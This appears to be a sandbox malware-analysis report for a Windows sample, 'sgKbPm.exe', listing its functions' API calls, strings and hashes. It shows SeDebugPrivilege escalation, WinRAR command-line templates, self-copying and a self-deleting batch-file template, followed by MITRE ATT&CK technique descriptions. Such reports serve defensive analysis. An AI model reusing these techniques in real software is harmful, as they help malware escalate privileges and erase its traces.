Associated: 00000001.00000002.2433329254.0000000000C50000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2433341991.0000000000C51000.00000020.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2433355566.0000000000C53000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2433368827.0000000000C54000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c50000_sgKbPm.jbxd

Similarity

API ID: Virtual$Free$Alloc
String ID:
API String ID: 1852963964-0
Opcode ID: 3fee98707ba9208734260e689c74ba6419565494e69b6803b995e902e72d14a4
Instruction ID: 95f8c0a2073c35341d8b4d0e8dac84c0782f066fd6b18793c865450186da25e5
Opcode Fuzzy Hash: 3fee98707ba9208734260e689c74ba6419565494e69b6803b995e902e72d14a4
Instruction Fuzzy Hash: 7B116075A00649CFCF318E58CC817EE37A1EF41302F990419DD899B291DA712A88CB98

Non-executed Functions

Function 00C5119F Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(C:\Users\user\AppData\Local\Temp\sgKbPm.exe,?,?,?,?,?,?,00C513EF), ref: 00C511AB
OpenProcessToken.ADVAPI32(00000000,00000028,00C513EF,?,?,?,?,?,?,00C513EF), ref: 00C511BB
AdjustTokenPrivileges.ADVAPI32(00C513EF,00000000,?,00000010,00000000,00000000), ref: 00C511EB
CloseHandle.KERNEL32(00C513EF), ref: 00C511FA
CloseHandle.KERNEL32(?,?,?,?,?,?,?,00C513EF), ref: 00C51203

Strings

C:\Users\user\AppData\Local\Temp\sgKbPm.exe, xrefs: 00C511A5

Memory Dump Source

Source File: 00000001.00000002.2433341991.0000000000C51000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C50000, based on PE: true

Associated: 00000001.00000002.2433329254.0000000000C50000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2433355566.0000000000C53000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2433368827.0000000000C54000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2433382542.0000000000C56000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c50000_sgKbPm.jbxd

Similarity

API ID: CloseHandleProcessToken$AdjustCurrentOpenPrivileges
String ID: C:\Users\user\AppData\Local\Temp\sgKbPm.exe
API String ID: 75692138-2559047063
Opcode ID: 7c28ec3c2c160cad8abe4aaddb368cd93a13ee62bd2c627041438e4b80f3bc3f
Instruction ID: 8e473353cc793830032cd7f7c818e592cc434b167051c96c1e9fa9d2bf9cd9c9
Opcode Fuzzy Hash: 7c28ec3c2c160cad8abe4aaddb368cd93a13ee62bd2c627041438e4b80f3bc3f
Instruction Fuzzy Hash: 5701E879900349EFDB00DFD4CD89BAEBBB8FB04346F504469E605A2191D7755F849B60

Function 00C5139F Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 109COMMON

Download Yara Rule

APIs

GetVersionExA.KERNEL32(?,?,00000104,C:\Users\user\AppData\Local\Temp\sgKbPm.exe), ref: 00C513BC
LookupPrivilegeValueA.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 00C513DA
GetCurrentProcessId.KERNEL32(-00000094,0000000C,0000000C,00000001), ref: 00C51448

Part of subcall function 00C5119F: GetCurrentProcess.KERNEL32(C:\Users\user\AppData\Local\Temp\sgKbPm.exe,?,?,?,?,?,?,00C513EF), ref: 00C511AB
Part of subcall function 00C5119F: OpenProcessToken.ADVAPI32(00000000,00000028,00C513EF,?,?,?,?,?,?,00C513EF), ref: 00C511BB
Part of subcall function 00C5119F: AdjustTokenPrivileges.ADVAPI32(00C513EF,00000000,?,00000010,00000000,00000000), ref: 00C511EB
Part of subcall function 00C5119F: CloseHandle.KERNEL32(00C513EF), ref: 00C511FA
Part of subcall function 00C5119F: CloseHandle.KERNEL32(?,?,?,?,?,?,?,00C513EF), ref: 00C51203

Strings

SeDebugPrivilege, xrefs: 00C513D3
C:\Users\user\AppData\Local\Temp\sgKbPm.exe, xrefs: 00C513A8

Memory Dump Source

Source File: 00000001.00000002.2433341991.0000000000C51000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C50000, based on PE: true

Associated: 00000001.00000002.2433329254.0000000000C50000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2433355566.0000000000C53000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2433368827.0000000000C54000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2433382542.0000000000C56000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c50000_sgKbPm.jbxd

Similarity

API ID: Process$CloseCurrentHandleToken$AdjustLookupOpenPrivilegePrivilegesValueVersion
String ID: C:\Users\user\AppData\Local\Temp\sgKbPm.exe$SeDebugPrivilege
API String ID: 4123949106-2747920968
Opcode ID: c1baffb61098ba19807d66a626bf53a751c185bfa7c8ea462bf9640b857ad3db
Instruction ID: 70e3a20956ffe15cb49e0b97e6d2f2595ea0046c877c38b09629d593799916a2
Opcode Fuzzy Hash: c1baffb61098ba19807d66a626bf53a751c185bfa7c8ea462bf9640b857ad3db
Instruction Fuzzy Hash: C8316379D40209EADF20DBA5CC49FEEBBB8EB84706F184069ED14B2151D7309EC9CB64

Function 00C5239D Relevance: 56.2, APIs: 26, Strings: 6, Instructions: 239sleepfilestringCOMMON

Download Yara Rule

APIs

strstr.MSVCRT ref: 00C523CC
CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00C52464
GetFileSize.KERNEL32(00000000,00000000), ref: 00C52472
CloseHandle.KERNEL32(?,00000000,00000000), ref: 00C524A8
memset.MSVCRT ref: 00C524B9
strrchr.MSVCRT ref: 00C524C9
wsprintfA.USER32 ref: 00C524DE
strrchr.MSVCRT ref: 00C524ED
memset.MSVCRT ref: 00C524F2
memset.MSVCRT ref: 00C52505
wsprintfA.USER32 ref: 00C52524
Sleep.KERNEL32(000007D0), ref: 00C52535
Sleep.KERNEL32(000007D0), ref: 00C5255D
memset.MSVCRT ref: 00C5256E
wsprintfA.USER32 ref: 00C52585
memset.MSVCRT ref: 00C525A6
wsprintfA.USER32 ref: 00C525CA
Sleep.KERNEL32(000007D0), ref: 00C525D0
Sleep.KERNEL32(000007D0,?,?), ref: 00C525E5
CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00C525FC
CloseHandle.KERNEL32(00000000,00000000,00000001), ref: 00C52611
SetFilePointer.KERNEL32(FFFFFFFF,?,00000000,00000000), ref: 00C52642
WriteFile.KERNEL32(?,00000006,?,00000000), ref: 00C5265B
SetEndOfFile.KERNEL32 ref: 00C5266D
CloseHandle.KERNEL32(00000000), ref: 00C52676
RemoveDirectoryA.KERNEL32(?), ref: 00C52681

Strings

-ibck, xrefs: 00C525BA
C:\Users\user\AppData\Local\Temp\, xrefs: 00C523B1, 00C523B6, 00C524CD
%s X -ibck "%s" "%s\", xrefs: 00C5251E
%s M %s -r -o+ -ep1 "%s" "%s\*", xrefs: 00C525C4
%s%s, xrefs: 00C524D8
%s\, xrefs: 00C5257F

Memory Dump Source

Source File: 00000001.00000002.2433341991.0000000000C51000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C50000, based on PE: true

Associated: 00000001.00000002.2433329254.0000000000C50000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2433355566.0000000000C53000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2433368827.0000000000C54000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2433382542.0000000000C56000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c50000_sgKbPm.jbxd

Similarity

API ID: File$memset$Sleepwsprintf$CloseHandle$Createstrrchr$DirectoryPointerRemoveSizeWritestrstr
String ID: %s M %s -r -o+ -ep1 "%s" "%s\*"$%s X -ibck "%s" "%s\"$%s%s$%s\$-ibck$C:\Users\user\AppData\Local\Temp\
API String ID: 2203340711-2750826870
Opcode ID: 2703be81eb0950b31d07dbad94522eff3921cf203cfbb26ee3809d8bef673bf5
Instruction ID: 024df3cee5307816dd59b707eb3a27437ab5b7ac247ecbb32d6ac3293d77a421
Opcode Fuzzy Hash: 2703be81eb0950b31d07dbad94522eff3921cf203cfbb26ee3809d8bef673bf5
Instruction Fuzzy Hash: 6781C0B9504344ABD7109F60DC89FAFB7ECEB85746F00051AFA84E2191D7709AC98B6A

Function 00C5274A Relevance: 28.1, APIs: 9, Strings: 7, Instructions: 83fileCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00C52766
memset.MSVCRT ref: 00C52774
SHGetSpecialFolderPathA.SHELL32(00000000,?,00000026,00000000), ref: 00C52787
wsprintfA.USER32 ref: 00C527AB

Part of subcall function 00C5185B: GetSystemTimeAsFileTime.KERNEL32(00C51F92,00000000,?,00000000,?,?,?,00C51F92,?,00000000,00000002), ref: 00C51867
Part of subcall function 00C5185B: srand.MSVCRT ref: 00C51878
Part of subcall function 00C5185B: rand.MSVCRT ref: 00C51880
Part of subcall function 00C5185B: srand.MSVCRT ref: 00C51890
Part of subcall function 00C5185B: rand.MSVCRT ref: 00C51894

wsprintfA.USER32 ref: 00C527C6
CopyFileA.KERNEL32(?,00C54C80,00000000), ref: 00C527D4
wsprintfA.USER32 ref: 00C527F4

Part of subcall function 00C51973: PathFileExistsA.SHLWAPI(00C54E5C,00000000,C:\Users\user\AppData\Local\Temp\sgKbPm.exe), ref: 00C51992
Part of subcall function 00C51973: CreateFileA.KERNEL32(00C54E5C,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 00C519BA
Part of subcall function 00C51973: Sleep.KERNEL32(00000064), ref: 00C519C6
Part of subcall function 00C51973: wsprintfA.USER32 ref: 00C519EC
Part of subcall function 00C51973: CopyFileA.KERNEL32(00C54E5C,?,00000000), ref: 00C51A00
Part of subcall function 00C51973: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00C51A1E
Part of subcall function 00C51973: GetFileSize.KERNEL32(00C54E5C,00000000), ref: 00C51A2C
Part of subcall function 00C51973: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 00C51A46
Part of subcall function 00C51973: ReadFile.KERNEL32(00C54E5C,00C54E60,00000000,?,00000000), ref: 00C51A65

DeleteFileA.KERNEL32(?,?,00C54E54,00C54E58), ref: 00C5281A
CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000004,00000000,00000000,?,00C54E54,00C54E58), ref: 00C52832

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00C527B6
C:\Windows\system32, xrefs: 00C527E3
%s\%s, xrefs: 00C527EE
%s%s, xrefs: 00C527A5
\WinRAR\Rar.exe, xrefs: 00C52793
%s%.8x.exe, xrefs: 00C527BB
c_31892.nls, xrefs: 00C527DE

Memory Dump Source

Source File: 00000001.00000002.2433341991.0000000000C51000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C50000, based on PE: true

Associated: 00000001.00000002.2433329254.0000000000C50000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2433355566.0000000000C53000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2433368827.0000000000C54000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2433382542.0000000000C56000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c50000_sgKbPm.jbxd

Similarity

API ID: File$wsprintf$Create$CopyPathTimememsetrandsrand$AllocDeleteExistsFolderReadSizeSleepSpecialSystemVirtual
String ID: %s%.8x.exe$%s%s$%s\%s$C:\Users\user\AppData\Local\Temp\$C:\Windows\system32$\WinRAR\Rar.exe$c_31892.nls
API String ID: 692489704-613076915
Opcode ID: acacf3a58b377753a5b5485bdb43c105a95de151d29e2df11a2b6d019d1d222e
Instruction ID: de4bdcffd1d5c1656d5a839a000306ab77de3c05477c93737ad05ac937aa8569
Opcode Fuzzy Hash: acacf3a58b377753a5b5485bdb43c105a95de151d29e2df11a2b6d019d1d222e
Instruction Fuzzy Hash: ED2156BE94035C7BDB10D7A49C89FDB73ACDB0474AF4005A1BE44E2082E6709FC84A68

Function 00C51581 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 67filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00C5185B: GetSystemTimeAsFileTime.KERNEL32(00C51F92,00000000,?,00000000,?,?,?,00C51F92,?,00000000,00000002), ref: 00C51867
Part of subcall function 00C5185B: srand.MSVCRT ref: 00C51878
Part of subcall function 00C5185B: rand.MSVCRT ref: 00C51880
Part of subcall function 00C5185B: srand.MSVCRT ref: 00C51890
Part of subcall function 00C5185B: rand.MSVCRT ref: 00C51894

wsprintfA.USER32 ref: 00C515AA
wsprintfA.USER32 ref: 00C515C6
lstrlen.KERNEL32(?), ref: 00C515D2
CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000002,00000000,00000000), ref: 00C515EE
WriteFile.KERNEL32(00000000,?,00000000,00000001,00000000), ref: 00C51609
CloseHandle.KERNEL32(00000000), ref: 00C51612
ShellExecuteA.SHELL32(00000000,open,?,00000000,00000000,00000000), ref: 00C5162D

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00C51599
open, xrefs: 00C51627
%s%.8x.bat, xrefs: 00C515A4
:DELFILEdel "%s"if exist "%s" goto :DELFILEdel "%s", xrefs: 00C515C0
C:\Users\user\AppData\Local\Temp\sgKbPm.exe, xrefs: 00C5158A, 00C515B3, 00C515B8, 00C515B9

Memory Dump Source

Source File: 00000001.00000002.2433341991.0000000000C51000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C50000, based on PE: true

Associated: 00000001.00000002.2433329254.0000000000C50000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2433355566.0000000000C53000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2433368827.0000000000C54000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2433382542.0000000000C56000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c50000_sgKbPm.jbxd

Similarity

API ID: File$Timerandsrandwsprintf$CloseCreateExecuteHandleShellSystemWritelstrlen
String ID: %s%.8x.bat$:DELFILEdel "%s"if exist "%s" goto :DELFILEdel "%s"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\sgKbPm.exe$open
API String ID: 617340118-1352319835
Opcode ID: 7c37f6cf7831bb1db218888af5e15606f2583b34a7a84232e3978680548bf478
Instruction ID: df89516e30a7a3d4e52666c52d28e28abb684ed64488a5bdb166cee82defeafb
Opcode Fuzzy Hash: 7c37f6cf7831bb1db218888af5e15606f2583b34a7a84232e3978680548bf478
Instruction Fuzzy Hash: ED11547A9012687AD72097A59C8DFEF7A6CDF59792F040061FD49E2041DA709BC88BB4

Function 00C5120E Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 93librarymemoryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(ntdll.dll,ZwQuerySystemInformation,00000104,?,?,?,?,00C51400), ref: 00C51226
GetProcAddress.KERNEL32(00000000), ref: 00C5122D
GetCurrentProcessId.KERNEL32(?,?,?,?,00C51400), ref: 00C5123F
OpenProcess.KERNEL32(00000400,00000000,00000000,?,?,?,?,00C51400), ref: 00C51250
VirtualFree.KERNEL32(00000000,00000000,00008000,?,C:\Users\user\AppData\Local\Temp\sgKbPm.exe,?,?,?,?,00C51400), ref: 00C5129E
VirtualAlloc.KERNEL32(00000000,00050000,00003000,00000004,00000001,?,C:\Users\user\AppData\Local\Temp\sgKbPm.exe,?,?,?,?,00C51400), ref: 00C512B0
CloseHandle.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\sgKbPm.exe,?,?,?,?,00C51400), ref: 00C512F5
VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,00C51400), ref: 00C5130A

Strings

ZwQuerySystemInformation, xrefs: 00C51212
ntdll.dll, xrefs: 00C51219
C:\Users\user\AppData\Local\Temp\sgKbPm.exe, xrefs: 00C51262

Memory Dump Source

Source File: 00000001.00000002.2433341991.0000000000C51000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C50000, based on PE: true

Associated: 00000001.00000002.2433329254.0000000000C50000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2433355566.0000000000C53000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2433368827.0000000000C54000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2433382542.0000000000C56000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c50000_sgKbPm.jbxd

Similarity

API ID: Virtual$FreeHandleProcess$AddressAllocCloseCurrentModuleOpenProc
String ID: C:\Users\user\AppData\Local\Temp\sgKbPm.exe$ZwQuerySystemInformation$ntdll.dll
API String ID: 1500695312-1505229931
Opcode ID: bf17d8526c489be5ec67059140286748e72f0714904c23a0942c488e72c45dad
Instruction ID: 91e58c5f50c8415fb8f670415c61cd9eafb8634b0a35e57a01df0410c3c911ee
Opcode Fuzzy Hash: bf17d8526c489be5ec67059140286748e72f0714904c23a0942c488e72c45dad
Instruction Fuzzy Hash: 1F210679705351ABD7209F65CC0CB6FBAA8FB85B52F080918FD55E6280C770DAC8C7A9

Function 00C52692 Relevance: 12.1, APIs: 8, Instructions: 64stringsynchronizationCOMMON

Download Yara Rule

APIs

CreateEventA.KERNEL32(00000000,00000000,00000001,00000000,7591E800,?,?,00C529DB,?,00000001), ref: 00C526A7
WaitForSingleObject.KERNEL32(00000000,000000FF,7591E800,?,?,00C529DB,?,00000001), ref: 00C526B5
lstrlen.KERNEL32(?), ref: 00C526C4
??2@YAPAXI@Z.MSVCRT(-00000005), ref: 00C526CE
lstrcpy.KERNEL32(00000004,?), ref: 00C526E3
lstrcpy.KERNEL32(?,00000004), ref: 00C5271F
??3@YAXPAX@Z.MSVCRT(00000000), ref: 00C5272D
SetEvent.KERNEL32 ref: 00C5273C

Memory Dump Source

Source File: 00000001.00000002.2433341991.0000000000C51000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C50000, based on PE: true

Associated: 00000001.00000002.2433329254.0000000000C50000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2433355566.0000000000C53000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2433368827.0000000000C54000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2433382542.0000000000C56000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c50000_sgKbPm.jbxd

Similarity

API ID: Eventlstrcpy$??2@??3@CreateObjectSingleWaitlstrlen
String ID:
API String ID: 41106472-0
Opcode ID: 6ba416cac157051960009bbf8830f7869acfd0498817dc2f2ad28614f18cdb42
Instruction ID: 9b3d8f6864551d9f76631e5bfba2f6c3a568ad640d76a88416f8b0df191b2991
Opcode Fuzzy Hash: 6ba416cac157051960009bbf8830f7869acfd0498817dc2f2ad28614f18cdb42
Instruction Fuzzy Hash: CC11AC3E400300AFCB229F15EC48B6EBBF9FB967A77104016F854A7160D7709AC9EB54

Function 00C51B8A Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 81stringCOMMON

Download Yara Rule

APIs

srand.MSVCRT ref: 00C51BCD
rand.MSVCRT ref: 00C51BD8
memset.MSVCRT ref: 00C51C43
memcpy.MSVCRT(?,LoSZWWEUdpfxdJFubCxyDnfDtvPIcvAtcbhLFmTbzLlPeHjiRuUwMUZRtrEVSVpgnQkHXqwKVusBqGhXkyKaCyNmdawrogOzKfxsNYYSCPXIBrjNTeDsjIQRFYeTiOiJpoAavMgHZzOckhlBWmGnMQGqAEJl,00000006,?,00000000,00000040,?,00000000,00000000,?,00000000,00000002), ref: 00C51C4F
lstrcat.KERNEL32(?,.exe), ref: 00C51C5D

Strings

LoSZWWEUdpfxdJFubCxyDnfDtvPIcvAtcbhLFmTbzLlPeHjiRuUwMUZRtrEVSVpgnQkHXqwKVusBqGhXkyKaCyNmdawrogOzKfxsNYYSCPXIBrjNTeDsjIQRFYeTiOiJpoAavMgHZzOckhlBWmGnMQGqAEJl, xrefs: 00C51B8A, 00C51B9C, 00C51C15, 00C51C49
.exe, xrefs: 00C51C57

Memory Dump Source

Source File: 00000001.00000002.2433341991.0000000000C51000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C50000, based on PE: true

Associated: 00000001.00000002.2433329254.0000000000C50000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2433355566.0000000000C53000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2433368827.0000000000C54000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2433382542.0000000000C56000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c50000_sgKbPm.jbxd

Similarity

API ID: lstrcatmemcpymemsetrandsrand
String ID: .exe$LoSZWWEUdpfxdJFubCxyDnfDtvPIcvAtcbhLFmTbzLlPeHjiRuUwMUZRtrEVSVpgnQkHXqwKVusBqGhXkyKaCyNmdawrogOzKfxsNYYSCPXIBrjNTeDsjIQRFYeTiOiJpoAavMgHZzOckhlBWmGnMQGqAEJl
API String ID: 122620767-3278051682
Opcode ID: ba2020e053f5c763a7a680130f33be459c9b7ce84c2b6d220797f46795e78360
Instruction ID: 5c5caa3c2ee488f062e8b9589c07aa04ba54aa2c4341b4070d97e739ac93bc86
Opcode Fuzzy Hash: ba2020e053f5c763a7a680130f33be459c9b7ce84c2b6d220797f46795e78360
Instruction Fuzzy Hash: 7D214C3EE443D06FD21A1336AC45B6D3B54DFE3B17F190099FD952B1D2D1640AC9C268

Function 00C5189D Relevance: 9.1, APIs: 6, Instructions: 51processsynchronizationCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00C518B1
CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000001,0C000000,00000000,00000000,?,?,000007D0,75920F00,75A78400), ref: 00C518D3
CloseHandle.KERNEL32(00C52549), ref: 00C518E9
WaitForSingleObject.KERNEL32(?,000000FF), ref: 00C518F0
GetExitCodeProcess.KERNEL32(?,00C52549), ref: 00C51901
CloseHandle.KERNEL32(?), ref: 00C5190A

Memory Dump Source

Source File: 00000001.00000002.2433341991.0000000000C51000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C50000, based on PE: true

Associated: 00000001.00000002.2433329254.0000000000C50000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2433355566.0000000000C53000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2433368827.0000000000C54000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2433382542.0000000000C56000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c50000_sgKbPm.jbxd

Similarity

API ID: CloseHandleProcess$CodeCreateExitObjectSingleWaitmemset
String ID:
API String ID: 876959470-0
Opcode ID: 9cda2d82420e4b4a2b8e1ca2b74664412d68e1bb4d6075fd2d42960ed6c7ec98
Instruction ID: 36402daa925a7809d8e4e7ba217c5b5776f27e1ca41c9b751d68e45c91464f41
Opcode Fuzzy Hash: 9cda2d82420e4b4a2b8e1ca2b74664412d68e1bb4d6075fd2d42960ed6c7ec98
Instruction Fuzzy Hash: EB01717A901268BBCB216B95DC48EDFBF7DEF85761F104021F915A51A0D6314A98CAA0

Function 00C51319 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 53libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(ntdll.dll,NtSystemDebugControl,-00000094,-00000094,0000000C,0000000C,00000001), ref: 00C51334
GetProcAddress.KERNEL32(00000000), ref: 00C5133B
memset.MSVCRT ref: 00C51359

Strings

ntdll.dll, xrefs: 00C5132F
NtSystemDebugControl, xrefs: 00C5132A

Memory Dump Source

Source File: 00000001.00000002.2433341991.0000000000C51000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C50000, based on PE: true

Associated: 00000001.00000002.2433329254.0000000000C50000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2433355566.0000000000C53000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2433368827.0000000000C54000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2433382542.0000000000C56000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c50000_sgKbPm.jbxd

Similarity

API ID: AddressHandleModuleProcmemset
String ID: NtSystemDebugControl$ntdll.dll
API String ID: 3137504439-2438149413
Opcode ID: f36db431a8933311166b917a2f6ee31b5c4c4525bf6f7eddea4eaa9d1e599d91
Instruction ID: 8ac92f6d976b1771bd1bf66576fab922bc8aa1770ec82fb85ce6aa1fae2dcd35
Opcode Fuzzy Hash: f36db431a8933311166b917a2f6ee31b5c4c4525bf6f7eddea4eaa9d1e599d91
Instruction Fuzzy Hash: 4401617960034DAFDB10DFA4AC89B6FBBACFB41316F04452AFD11A1150D27096D9CA55

Function 00C51DF6 Relevance: 7.5, APIs: 5, Instructions: 45stringCOMMON

Download Yara Rule

APIs

strrchr.MSVCRT ref: 00C51E0B
lstrcpy.KERNEL32(?,00000001), ref: 00C51E1C
strrchr.MSVCRT ref: 00C51E2B
lstrcmpiA.KERNEL32(?,00C54488), ref: 00C51E48
lstrlen.KERNEL32(00C54488), ref: 00C51E53

Memory Dump Source

Source File: 00000001.00000002.2433341991.0000000000C51000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C50000, based on PE: true

Associated: 00000001.00000002.2433329254.0000000000C50000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2433355566.0000000000C53000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2433368827.0000000000C54000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2433382542.0000000000C56000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c50000_sgKbPm.jbxd

Similarity

API ID: strrchr$lstrcmpilstrcpylstrlen
String ID:
API String ID: 3636361484-0
Opcode ID: 0854985365dee728b2ce44774e4546ea5d7617619979d42b56069c063da0290c
Instruction ID: 73a1f77473d73ca4a354ea2bb538da6b6b548ceb4b1b98da253c4affe78e5111
Opcode Fuzzy Hash: 0854985365dee728b2ce44774e4546ea5d7617619979d42b56069c063da0290c
Instruction Fuzzy Hash: 7501D6BA9043596FEB215760EC4DBDB779CDB04356F080066EE45E30D0EBB49EC88BA4

Function 00C5185B Relevance: 7.5, APIs: 5, Instructions: 31timeCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(00C51F92,00000000,?,00000000,?,?,?,00C51F92,?,00000000,00000002), ref: 00C51867
srand.MSVCRT ref: 00C51878
rand.MSVCRT ref: 00C51880
srand.MSVCRT ref: 00C51890
rand.MSVCRT ref: 00C51894

Memory Dump Source

Source File: 00000001.00000002.2433341991.0000000000C51000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C50000, based on PE: true

Associated: 00000001.00000002.2433329254.0000000000C50000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2433355566.0000000000C53000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2433368827.0000000000C54000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2433382542.0000000000C56000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c50000_sgKbPm.jbxd

Similarity

API ID: Timerandsrand$FileSystem
String ID:
API String ID: 4106363736-0
Opcode ID: b72cbd0b31d65644e050b8ce6b165f6443a0e34da8baa06e56eff3ef81dd389e
Instruction ID: a61f84d902666023185f66b88e9d83c5f13683ca31dbf39cf7c026320165163f
Opcode Fuzzy Hash: b72cbd0b31d65644e050b8ce6b165f6443a0e34da8baa06e56eff3ef81dd389e
Instruction Fuzzy Hash: 55E041775103187BD70057F9EC46A9EB7ACDEC41717110567F500E3154E574FD848674

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
